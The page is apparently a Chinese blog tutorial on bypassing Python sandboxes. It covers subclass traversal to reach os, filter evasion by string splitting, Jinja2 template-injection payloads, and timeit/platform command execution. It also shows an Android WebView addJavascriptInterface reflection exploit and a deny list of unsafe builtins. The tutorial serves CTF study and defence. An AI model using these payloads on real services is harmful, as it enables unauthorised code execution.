<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>






<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="Yiruma" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="对python沙盒的编写以及现有几种常见的沙盒绕过策略的一点总结">
<meta name="keywords">
<meta property="og:type" content="article">
<meta property="og:title" content="python沙盒的几种绕过方式">
<meta property="og:url" content="https://someonesometimes.github.io/2017/11/16/python沙盒绕过/index.html">
<meta property="og:site_name" content="Yiruma">
<meta property="og:description" content="对python沙盒的编写以及现有几种常见的沙盒绕过策略的一点总结">
<meta property="og:updated_time" content="2018-02-17T07:44:45.097Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="python沙盒的几种绕过方式">
<meta name="twitter:description" content="对python沙盒的编写以及现有几种常见的沙盒绕过策略的一点总结">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://someonesometimes.github.io/2017/11/16/python沙盒绕过/"/>





  <title>python沙盒的几种绕过方式 | Yiruma</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  















  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Yiruma</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      
        
        <li class="menu-item menu-item-link">
          <a href="/link" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-link"></i> <br />
            
            友链
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="https://someonesometimes.github.io/2017/11/16/python沙盒绕过/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Yiruma">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Yiruma">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">python沙盒的几种绕过方式</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-11-16T11:05:18+08:00">
                2017-11-16
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>对python沙盒的编写以及现有几种常见的沙盒绕过策略的一点总结</p>
<a id="more"></a>
<h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><h3 id="内建名称空间-builtins"><a href="#内建名称空间-builtins" class="headerlink" title="内建名称空间 __builtins__"></a>内建名称空间 <code>__builtins__</code></h3><p>在启动Python解释器之后，即使没有创建任何的变量或者函数，还是会有许多函数可以使用，这些函数就是内建函数，并不需要我们自己做定义，而是在启动python解释器的时候，就已经导入到内存中供我们使用，想要了解这里面的工作原理，我们可以从名称空间开始</p>
<p>名称空间在python是个非常重要的概念，只得是从名称到对象的映射，而在python程序的执行过程中，至少会存在两个名称空间</p>
<ul>
<li>内建名称空间</li>
<li>全局名称空间</li>
</ul>
<p>这里我们主要关注的是内建名称空间，是名字到内建对象的映射，，在python中，初始的<code>__builtins__</code>模块提供内建名称空间到内建对象的映射</p>
<p>dir()函数用于向我们展示一个对象的属性有哪些，在没有提供对象的时候，将会提供当前环境所导入的所有模块，我们可以看到初始模块有哪些</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&gt;&gt;&gt; </span>dir()</div><div class="line">[<span class="string">'__builtins__'</span>, <span class="string">'__doc__'</span>, <span class="string">'__name__'</span>, <span class="string">'__package__'</span>]</div><div class="line"><span class="meta">&gt;&gt;&gt; </span><span class="keyword">import</span> os</div><div class="line"><span class="meta">&gt;&gt;&gt; </span>dir()</div><div class="line">[<span class="string">'__builtins__'</span>, <span class="string">'__doc__'</span>, <span class="string">'__name__'</span>, <span class="string">'__package__'</span>, <span class="string">'base64'</span>, <span class="string">'os'</span>]</div></pre></td></tr></table></figure>
<p>这里面，我们可以看到<code>__builtins__</code>是做为默认初始模块出现的，那么用dir()命令看看<code>__builtins__</code>的成分</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&gt;&gt;&gt; </span>dir(__builtins__)</div><div class="line">[<span class="string">'ArithmeticError'</span>, <span class="string">'AssertionError'</span>, <span class="string">'AttributeError'</span>, <span class="string">'BaseException'</span>, <span class="string">'BufferError'</span>, <span class="string">'BytesWarning'</span>, <span class="string">'DeprecationWarning'</span>, <span class="string">'EOFError'</span>, <span class="string">'Ellipsis'</span>, <span class="string">'EnvironmentError'</span>, <span class="string">'Exception'</span>, <span class="string">'False'</span>, <span class="string">'FloatingPointError'</span>, <span class="string">'FutureWarning'</span>, <span class="string">'GeneratorExit'</span>, <span class="string">'IOError'</span>, <span class="string">'ImportError'</span>, <span class="string">'ImportWarning'</span>, <span class="string">'IndentationError'</span>, <span class="string">'IndexError'</span>, <span class="string">'KeyError'</span>, <span class="string">'KeyboardInterrupt'</span>, <span class="string">'LookupError'</span>, <span class="string">'MemoryError'</span>, <span class="string">'NameError'</span>, <span class="string">'None'</span>, <span class="string">'NotImplemented'</span>, <span class="string">'NotImplementedError'</span>, <span class="string">'OSError'</span>, <span class="string">'OverflowError'</span>, <span class="string">'PendingDeprecationWarning'</span>, <span class="string">'ReferenceError'</span>, <span class="string">'RuntimeError'</span>, <span class="string">'RuntimeWarning'</span>, <span class="string">'StandardError'</span>, <span class="string">'StopIteration'</span>, <span class="string">'SyntaxError'</span>, <span class="string">'SyntaxWarning'</span>, <span class="string">'SystemError'</span>, <span class="string">'SystemExit'</span>, <span class="string">'TabError'</span>, <span class="string">'True'</span>, <span class="string">'TypeError'</span>, <span class="string">'UnboundLocalError'</span>, <span class="string">'UnicodeDecodeError'</span>, <span class="string">'UnicodeEncodeError'</span>, <span class="string">'UnicodeError'</span>, <span class="string">'UnicodeTranslateError'</span>, <span class="string">'UnicodeWarning'</span>, <span class="string">'UserWarning'</span>, <span class="string">'ValueError'</span>, <span class="string">'Warning'</span>, <span class="string">'WindowsError'</span>, <span class="string">'ZeroDivisionError'</span>, <span class="string">'_'</span>, <span class="string">'__debug__'</span>, <span class="string">'__doc__'</span>, <span class="string">'__import__'</span>, <span class="string">'__name__'</span>, <span class="string">'__package__'</span>, <span class="string">'abs'</span>, <span class="string">'all'</span>, <span class="string">'any'</span>, <span class="string">'apply'</span>, <span class="string">'basestring'</span>, <span class="string">'bin'</span>, <span class="string">'bool'</span>, <span class="string">'buffer'</span>, <span class="string">'bytearray'</span>, <span class="string">'bytes'</span>, <span class="string">'callable'</span>, <span class="string">'chr'</span>, <span class="string">'classmethod'</span>, <span class="string">'cmp'</span>, <span class="string">'coerce'</span>, <span class="string">'compile'</span>, <span class="string">'complex'</span>, <span class="string">'copyright'</span>, <span class="string">'credits'</span>, <span class="string">'delattr'</span>, <span class="string">'dict'</span>, <span class="string">'dir'</span>, <span class="string">'divmod'</span>, <span class="string">'enumerate'</span>, <span class="string">'eval'</span>, <span class="string">'execfile'</span>, <span class="string">'exit'</span>, <span class="string">'file'</span>, <span class="string">'filter'</span>, <span class="string">'float'</span>, <span class="string">'format'</span>, <span class="string">'frozenset'</span>, <span class="string">'getattr'</span>, <span class="string">'globals'</span>, <span class="string">'hasattr'</span>, <span class="string">'hash'</span>, <span class="string">'help'</span>, <span class="string">'hex'</span>, <span class="string">'id'</span>, <span class="string">'input'</span>, <span class="string">'int'</span>, <span class="string">'intern'</span>, <span class="string">'isinstance'</span>, <span class="string">'issubclass'</span>, <span class="string">'iter'</span>, <span class="string">'len'</span>, <span class="string">'license'</span>, <span class="string">'list'</span>, <span class="string">'locals'</span>, <span class="string">'long'</span>, <span class="string">'map'</span>, <span class="string">'max'</span>, <span class="string">'memoryview'</span>, <span class="string">'min'</span>, <span class="string">'next'</span>, <span class="string">'object'</span>, <span class="string">'oct'</span>, <span class="string">'open'</span>, <span class="string">'ord'</span>, <span class="string">'pow'</span>, <span class="string">'print'</span>, <span class="string">'property'</span>, <span class="string">'quit'</span>, <span class="string">'range'</span>, <span class="string">'raw_input'</span>, <span class="string">'reduce'</span>, <span class="string">'reload'</span>, <span class="string">'repr'</span>, <span class="string">'reversed'</span>, <span class="string">'round'</span>, <span class="string">'set'</span>, <span class="string">'setattr'</span>, <span class="string">'slice'</span>, <span class="string">'sorted'</span>, <span class="string">'staticmethod'</span>, <span class="string">'str'</span>, <span class="string">'sum'</span>, <span class="string">'super'</span>, <span class="string">'tuple'</span>, <span class="string">'type'</span>, <span class="string">'unichr'</span>, <span class="string">'unicode'</span>, <span class="string">'vars'</span>, <span class="string">'xrange'</span>, <span class="string">'zip'</span>]</div></pre></td></tr></table></figure>
<p>从里面我们可以看到一些我们经常用到的函数：open(),eval(),len(),<code>__import__</code>,以及我们刚才用的dir()函数，还有我们要用的一些对象诸如list,dict,tuple,int,float这些，然后还有一些异常啥的。当然，这里面最关键的就是<code>__import__</code>了，可以使用import函数的话，就可以导入任意模块了。</p>
<p>因为后面的绕过，所以这里要先提一下，python中每个对象都会提供dict属性，用于对象属性值到属性的映射，我们通过dir()可以看到一个对象的所有属性，然后可以通过<code>__builtins__.open</code>去调用它，其实同时我们也可以通过对象中带有的—<code>__dict__</code>通过属性名映射访问到对应的属性，既然是通过字符串访问属性，所以这里属性名是可以很容易逃过字符匹配的的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&gt;&gt;&gt; </span>__builtins__.open</div><div class="line">&lt;built-<span class="keyword">in</span> function open&gt;</div><div class="line"><span class="meta">&gt;&gt;&gt; </span>__builtins__.__dict__[<span class="string">'op'</span>+<span class="string">'en'</span>]</div><div class="line">&lt;built-<span class="keyword">in</span> function open&gt;</div><div class="line"><span class="meta">&gt;&gt;&gt; </span>__builtins__.__dict__[<span class="string">'b3Blbg=='</span>.decode(<span class="string">'base64'</span>)]</div><div class="line">&lt;built-<span class="keyword">in</span> function open&gt;</div></pre></td></tr></table></figure>
<h3 id="python中的类继承以及全局变量方法"><a href="#python中的类继承以及全局变量方法" class="headerlink" title="python中的类继承以及全局变量方法"></a>python中的类继承以及全局变量方法</h3><p>在网上没有找到太多的解释，可能有些地方理解是错的，还请师傅们指出orz。用起来是没问题的。</p>
<p>python中对一个变量采用<code>__class__</code>从变量转到对应的对象后，有这些类继承的方法</p>
<ul>
<li><code>__base__</code>  对象的一个基类，大多数结果都为<code>&lt;type &#39;object&#39;&gt;</code></li>
<li><code>__subclasses__()</code>  对象的子类，为一个列表</li>
<li><code>&lt;class &#39;xxx&#39;&gt;.__init__.__globals__</code>  返回一个类的全局变量，为字典形式，这里面常常包含我们想要的模块或者函数</li>
</ul>
<p>了解这些是有些用处的，我们的可以从变量-&gt;对象-&gt;基类-&gt;子类遍历-&gt;全局变量  这个流程中，找到我们想要的模块或者函数</p>
<h2 id="从沙盒编写中看沙盒逃逸思路"><a href="#从沙盒编写中看沙盒逃逸思路" class="headerlink" title="从沙盒编写中看沙盒逃逸思路"></a>从沙盒编写中看沙盒逃逸思路</h2><h3 id="通过删除内建空间中的成员来限制"><a href="#通过删除内建空间中的成员来限制" class="headerlink" title="通过删除内建空间中的成员来限制"></a>通过删除内建空间中的成员来限制</h3><p>比较典型的删除名单列表</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">make_secure</span><span class="params">()</span>:</span></div><div class="line">    UNSAFE = [<span class="string">'open'</span>,</div><div class="line">              <span class="string">'file'</span>,</div><div class="line">              <span class="string">'execfile'</span>,</div><div class="line">              <span class="string">'compile'</span>,</div><div class="line">              <span class="string">'reload'</span>,</div><div class="line">              <span class="string">'__import__'</span>,</div><div class="line">              <span class="string">'eval'</span>,</div><div class="line">              <span class="string">'input'</span>]</div><div class="line">    <span class="keyword">for</span> func <span class="keyword">in</span> UNSAFE:</div><div class="line">        <span class="keyword">del</span> __builtins__.__dict__[func]</div></pre></td></tr></table></figure>
<p><code>__import__</code>被删掉了，限制了对敏感模块的导入</p>
<p><code>reload</code>被删掉了，限制了对已有模块的重新导入，<code>reload(__builtins__)</code></p>
<p><code>open</code>被删掉了，限制文件读写</p>
<p><code>eval</code>被删掉了，限制字符代码执行</p>
<p>如果没有限制reload的话，就可以将<code>__builtins__</code>重新导入，但是在这种经典配置下，似乎我们目前只有下面这一种姿势去搞：</p>
<p>其实思路之前已经介绍过了，就是变量-&gt;对象-&gt;基类-&gt;子类遍历-&gt;全局变量 ，在这个流程中找到我们想要的模块或者函数。介绍一个简易的寻找代码</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div></pre></td><td class="code"><pre><div class="line">def findModule(srcmodule, dstmodule):</div><div class="line">    i = 0</div><div class="line">    results = srcmodule.__class__.__base__.__subclasses__()</div><div class="line">    for item in results:</div><div class="line">        i += 1</div><div class="line">        if '&lt;class' in str(item):</div><div class="line">            try:</div><div class="line">                modules = item.__init__.__globals__.keys()</div><div class="line">                for module in modules:</div><div class="line">                    # print module</div><div class="line">                    if dstmodule == module:</div><div class="line">                        print(item,i-1,str(srcmodule)+".__class__.__base__.__subclasses__()["+str(i-1)+"].__init__.__globals__['" + str(dstmodule) + "']")</div><div class="line">                        break</div><div class="line">            except:</div><div class="line">                pass</div><div class="line">              </div><div class="line">运行：</div><div class="line">findModule([],'os')</div><div class="line">输出：</div><div class="line">(&lt;class 'site._Printer'&gt;, 72, "[].__class__.__base__.__subclasses__()[72].__init__.__globals__['os']")</div><div class="line">(&lt;class 'site.Quitter'&gt;, 77, "[].__class__.__base__.__subclasses__()[77].__init__.__globals__['os']")</div></pre></td></tr></table></figure>
<h3 id="通过对参数的匹配来进行过滤"><a href="#通过对参数的匹配来进行过滤" class="headerlink" title="通过对参数的匹配来进行过滤"></a>通过对参数的匹配来进行过滤</h3><p>通过字符匹配去做过滤，python写法那么多，我们采用不同的写法就好了，所以应对这种姿势的方法也是多种多样</p>
<ol>
<li><p>一般都会限制os，import</p>
<p>可以考虑以下几个思路，<code>__builtins__</code>里面包含着import方法，借助之前提到的<code>__dict__</code>属性可以通过字符串编码绕过</p>
<p><code>__builtins__.__dict__[&#39;__impo&#39;+&#39;rt__&#39;](&#39;o&#39;+&#39;s&#39;)</code>，这里不仅属性是字符串来表示的了，因为这时候import作为一个函数，所以要导入的模块也是一个字符串，我们可以进行拼接，编码等操作</p>
</li>
<li><p>限制<code>__ [] &#39;等各种字符</code> </p>
<p>本来我以为也能利用<code>__dict__</code>的方法，将payload中的属性转变为字符串来表示的，但一来<code>__dict__</code>自身就带有<code>__</code>，二来<code>__globals__ __subclasses__  __base__</code>这些并不是属性，无法使用<code>__dict__</code>，所以非模板注入的情况下，暂时没有找到绕过的方法</p>
<p>但是在Jinja2模板注入中，绕过是可行的：</p>
<ul>
<li><p>可以用<code>[].__class__[&#39;__base__&#39;]</code>来表示<code>[].__class__.__base__</code>，为了免去从变量到对象这一步则使用flask中的request对象，也就是<code>request[&#39;_&#39;+&#39;_base_&#39;+&#39;_&#39;]</code></p>
</li>
<li><p>如果不允许用[]，jinja2中的函数|attr()也可以代表属性，更推荐用这种</p>
<p><code>[]|attr(&#39;__class__&#39;)|attr(&#39;__base__&#39;)</code></p>
</li>
<li><p>如果禁止使用引号，可以考虑使用request.args.para1参数来代表</p>
<p><code>url?mobancanshu=[]|attr(request.args.para1)&amp;para1=__class__</code></p>
<p>当然，如果<code>__</code>的检测是对全部传入参数的，还可以使用Jinja2中自带的链接函数<code>(&#39;a&#39;,&#39;b&#39;)|join</code>，所以最后的payload就是这样</p>
<p><code>mobancanshu=[]|attr((request.args.para1*2, request.args.para2, request.args.para1*2)|join)|attr((request.args.para1*2, request.args.para3, request.args.para1*2)|join)&amp;para1=_&amp;para2=class&amp;para3=base</code></p>
<p>再加一句，如果<code>|join</code>被过滤，其实还有个替代函数<code>mobancanshu=(request.args.para1)|format(request.args.pata2, request.args.pata2, request.args.pata2, request.args.pata2)&amp;para1=%s%sbase%s%s&amp;para2=_</code></p>
</li>
<li><p>在hctf中又看到了一些绕过的姿势</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">过滤了：	</div><div class="line">空格(%20)，回车(%0a)，&apos;__&apos;,&apos;[&apos;,&apos;]&apos;,&apos;os&apos;,&apos;&quot;&apos;,&quot;|[a-z]&quot;</div><div class="line">绕过方法：</div><div class="line">空格可以用tab(%09)绕过，|后不允许接a-z可以用%0c即|%0cattr，tab等绕过</div></pre></td></tr></table></figure>
</li>
</ul>
</li>
<li><p>接着上面提到的非模板注入下场景如果过滤了<code>__</code>暂时没有绕过方法这个话题，08067的比赛中有个有趣的场景</p>
<p>一个在线代码练习的网站，首先肯定不能禁用掉import，否则用户体验极差。。所以主要的过滤在基于字符的上面，过滤掉了<code>__</code>等字符，此时没必要执着在那个长长的魔术方法流程上了，用不了啦，<code>__builtins__</code>所提供的思路也用不了啦，既然是字符过滤，那么就考虑怎样使用字符形式的调用方法来绕过字符检测就好了。最开始自然想到eval，但是被删掉了。</p>
<p>解决方案是在import上下手，python中有很多内置模块可以import进去，我们可以在里面找到一些和eval类似的。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 用于测试代码的运行时间，可以将运行语句以字符串形式写出来，类似exec</span></div><div class="line"><span class="keyword">import</span> timeit</div><div class="line">timeit.timeit(<span class="string">"__import__('os').system('ls')"</span>, number=<span class="number">1</span>)</div></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 一般用于显示各种配置信息，可以直接写命令</span></div><div class="line"><span class="keyword">import</span> platform</div><div class="line"><span class="keyword">print</span> platform.popen(<span class="string">'ls'</span>, mode=<span class="string">'r'</span>).read()</div></pre></td></tr></table></figure>
</li>
</ol>
<h2 id="Android中类似的绕过方式"><a href="#Android中类似的绕过方式" class="headerlink" title="Android中类似的绕过方式"></a>Android中类似的绕过方式</h2><p>相信大家对Android中的Webview漏洞都不陌生，其中通过Js代码来调用Java代码的addJavascriptInterface 接口引起远程代码执行漏洞的实现原理也类似于上面我们所说的Python沙盒绕过</p>
<p>首先通过Android中的addJavascriptInterface函数可以为要执行的js代码绑定一个Java对象，之后js代码就可以直接调用这个Java对象的所有公有接口，如下所示：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">javascript.html</div><div class="line"></div><div class="line">&lt;script&gt;</div><div class="line">   <span class="function"><span class="keyword">function</span> <span class="title">callAndroid</span>(<span class="params"></span>)</span>&#123;</div><div class="line">  <span class="comment">// 由于对象映射，所以调用test对象等于调用Android映射的对象</span></div><div class="line">      test.hello(<span class="string">"js调用了android中的hello方法"</span>);</div><div class="line">   &#125;</div><div class="line">&lt;<span class="regexp">/script&gt;</span></div></pre></td></tr></table></figure>
 <figure class="highlight java"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">A.java</div><div class="line"></div><div class="line"><span class="comment">// 通过addJavascriptInterface()将Java对象映射到JS对象</span></div><div class="line"><span class="comment">//参数1：Javascript对象名</span></div><div class="line"><span class="comment">//参数2：Java对象名</span></div><div class="line">mWebView.addJavascriptInterface(<span class="keyword">new</span> AndroidtoJs(), <span class="string">"test"</span>);<span class="comment">//AndroidtoJS类对象映射到js的test对象</span></div><div class="line"></div><div class="line"><span class="comment">// 加载JS代码</span></div><div class="line"><span class="comment">// 格式规定为:file:///android_asset/文件名.html</span></div><div class="line">mWebView.loadUrl(<span class="string">"file:///android_asset/javascript.html"</span>);</div></pre></td></tr></table></figure>
<p>那么类似于上面python的绕过方式，在Java中我们可以通过Java的反射机制实现调用到其他的类：</p>
<ul>
<li>Android中的对象有一公共的方法：getClass() ，该方法可以获取到当前类，类型为Class</li>
<li>Class类有一关键的方法： Class.forName，可以用来加载一个指定的类</li>
<li>加载java.lang.Runtime 类，该类是可以执行本地命令的</li>
</ul>
<p>js代码可以如下书写：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">execute</span>(<span class="params">cmdArgs</span>)  </span></div><div class="line">&#123;  </div><div class="line">    <span class="comment">// 步骤1：遍历 window 对象</span></div><div class="line">    <span class="comment">// 目的是为了找到包含 getClass （）的对象</span></div><div class="line">    <span class="comment">// 因为Android映射的JS对象也在window中，所以肯定会遍历到</span></div><div class="line">    <span class="keyword">for</span> (<span class="keyword">var</span> obj <span class="keyword">in</span> <span class="built_in">window</span>) &#123;  </div><div class="line">        <span class="keyword">if</span> (<span class="string">"getClass"</span> <span class="keyword">in</span> <span class="built_in">window</span>[obj]) &#123;  </div><div class="line"></div><div class="line">      <span class="comment">// 步骤2：利用反射调用forName（）得到Runtime类对象</span></div><div class="line">            alert(obj);          </div><div class="line">            <span class="keyword">return</span>  <span class="built_in">window</span>[obj].getClass().forName(<span class="string">"java.lang.Runtime"</span>)  </div><div class="line"></div><div class="line">      <span class="comment">// 步骤3：以后，就可以调用静态方法来执行一些命令，比如访问文件的命令</span></div><div class="line">getMethod(<span class="string">"getRuntime"</span>,<span class="literal">null</span>).invoke(<span class="literal">null</span>,<span class="literal">null</span>).exec(cmdArgs);  </div><div class="line"></div><div class="line"><span class="comment">// 从执行命令后返回的输入流中得到字符串，有很严重暴露隐私的危险。</span></div><div class="line"><span class="comment">// 如执行完访问文件的命令之后，就可以得到文件名的信息了。</span></div><div class="line">        &#125;  </div><div class="line">    &#125;  </div><div class="line">&#125;</div></pre></td></tr></table></figure>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/11/16/XXE注入攻击/" rel="next" title="XXE注入攻击">
                <i class="fa fa-chevron-left"></i> XXE注入攻击
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/11/14/Out-Of-Band-带外攻击的一点总结/" rel="prev" title="Out Of Band 带外攻击的一点总结">
                Out Of Band 带外攻击的一点总结 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8zMTE1OS83NzA4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.gif"
               alt="Yiruma" />
          <p class="site-author-name" itemprop="name">Yiruma</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">25</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          

          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
